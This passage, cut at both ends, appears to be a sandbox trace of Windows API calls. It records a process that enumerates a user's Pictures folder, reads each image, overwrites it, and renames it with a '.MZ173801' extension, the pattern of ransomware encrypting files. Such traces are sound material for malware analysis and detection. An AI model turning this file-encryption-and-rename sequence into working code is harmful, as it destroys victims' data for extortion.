hTemplateFile=0x0) returned 0x3d0 [0115.929] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x1613e, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x1613e, lpOverlapped=0x0) returned 1 [0115.931] CloseHandle (hObject=0x3d0) returned 1 [0115.933] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\eT6BMD39LltKR7xUw6.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\et6bmd39lltkr7xuw6.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\eT6BMD39LltKR7xUw6.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\et6bmd39lltkr7xuw6.jpg.mz173801")) returned 1 [0115.934] GetCurrentThreadId () returned 0x1358 [0115.934] GetCurrentThreadId () returned 0x1358 [0115.934] GetCurrentThreadId () returned 0x1358 [0115.934] GetCurrentThreadId () returned 0x1358 [0115.934] GetCurrentThreadId () returned 0x1358 [0115.934] GetCurrentThreadId () returned 0x1358 [0115.934] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a14400, ftCreationTime.dwHighDateTime=0x1d5e534, ftLastAccessTime.dwLowDateTime=0xcb77fd90, ftLastAccessTime.dwHighDateTime=0x1d5e3d7, ftLastWriteTime.dwLowDateTime=0xcb77fd90, ftLastWriteTime.dwHighDateTime=0x1d5e3d7, nFileSizeHigh=0x0, nFileSizeLow=0x10498, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="fwT7xBA.jpg", cAlternateFileName="")) returned 1 [0115.934] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.934] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.934] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\fwT7xBA.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\fwt7xba.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a14400, ftCreationTime.dwHighDateTime=0x1d5e534, ftLastAccessTime.dwLowDateTime=0xcb77fd90, ftLastAccessTime.dwHighDateTime=0x1d5e3d7, ftLastWriteTime.dwLowDateTime=0xcb77fd90, ftLastWriteTime.dwHighDateTime=0x1d5e3d7, nFileSizeHigh=0x0, nFileSizeLow=0x10498)) returned 1 [0115.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.935] GetCurrentThreadId () returned 0x1358 [0115.935] GetCurrentThreadId () returned 0x1358 [0115.935] GetCurrentThreadId () returned 0x1358 [0115.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.935] GetCurrentThreadId () returned 0x1358 [0115.935] GetCurrentThreadId () returned 0x1358 [0115.936] GetCurrentThreadId () returned 0x1358 [0115.936] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\fwT7xBA.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\fwt7xba.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x10498 [0115.936] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.936] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x10498, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x10498, lpOverlapped=0x0) returned 1 [0115.937] CloseHandle (hObject=0x3d0) returned 1 [0115.938] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\fwT7xBA.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\fwt7xba.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.939] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x10498, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x10498, lpOverlapped=0x0) returned 1 [0115.941] CloseHandle (hObject=0x3d0) returned 1 [0116.016] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\fwT7xBA.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\fwt7xba.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\fwT7xBA.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\fwt7xba.jpg.mz173801")) returned 1 [0116.016] GetCurrentThreadId () returned 0x1358 [0116.016] GetCurrentThreadId () returned 0x1358 [0116.016] GetCurrentThreadId () returned 0x1358 [0116.016] GetCurrentThreadId () returned 0x1358 [0116.016] GetCurrentThreadId () returned 0x1358 [0116.016] GetCurrentThreadId () returned 0x1358 [0116.029] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b501fb0, ftCreationTime.dwHighDateTime=0x1d5e732, ftLastAccessTime.dwLowDateTime=0x90c21f90, ftLastAccessTime.dwHighDateTime=0x1d5e7ac, ftLastWriteTime.dwLowDateTime=0x90c21f90, ftLastWriteTime.dwHighDateTime=0x1d5e7ac, nFileSizeHigh=0x0, nFileSizeLow=0xd774, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="IZVvQMMfV6LuTAy.bmp", cAlternateFileName="IZVVQM~1.BMP")) returned 1 [0116.029] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.030] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.030] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\IZVvQMMfV6LuTAy.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\izvvqmmfv6lutay.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b501fb0, ftCreationTime.dwHighDateTime=0x1d5e732, ftLastAccessTime.dwLowDateTime=0x90c21f90, ftLastAccessTime.dwHighDateTime=0x1d5e7ac, ftLastWriteTime.dwLowDateTime=0x90c21f90, ftLastWriteTime.dwHighDateTime=0x1d5e7ac, nFileSizeHigh=0x0, nFileSizeLow=0xd774)) returned 1 [0116.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.030] GetCurrentThreadId () returned 0x1358 [0116.030] GetCurrentThreadId () returned 0x1358 [0116.030] GetCurrentThreadId () returned 0x1358 [0116.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM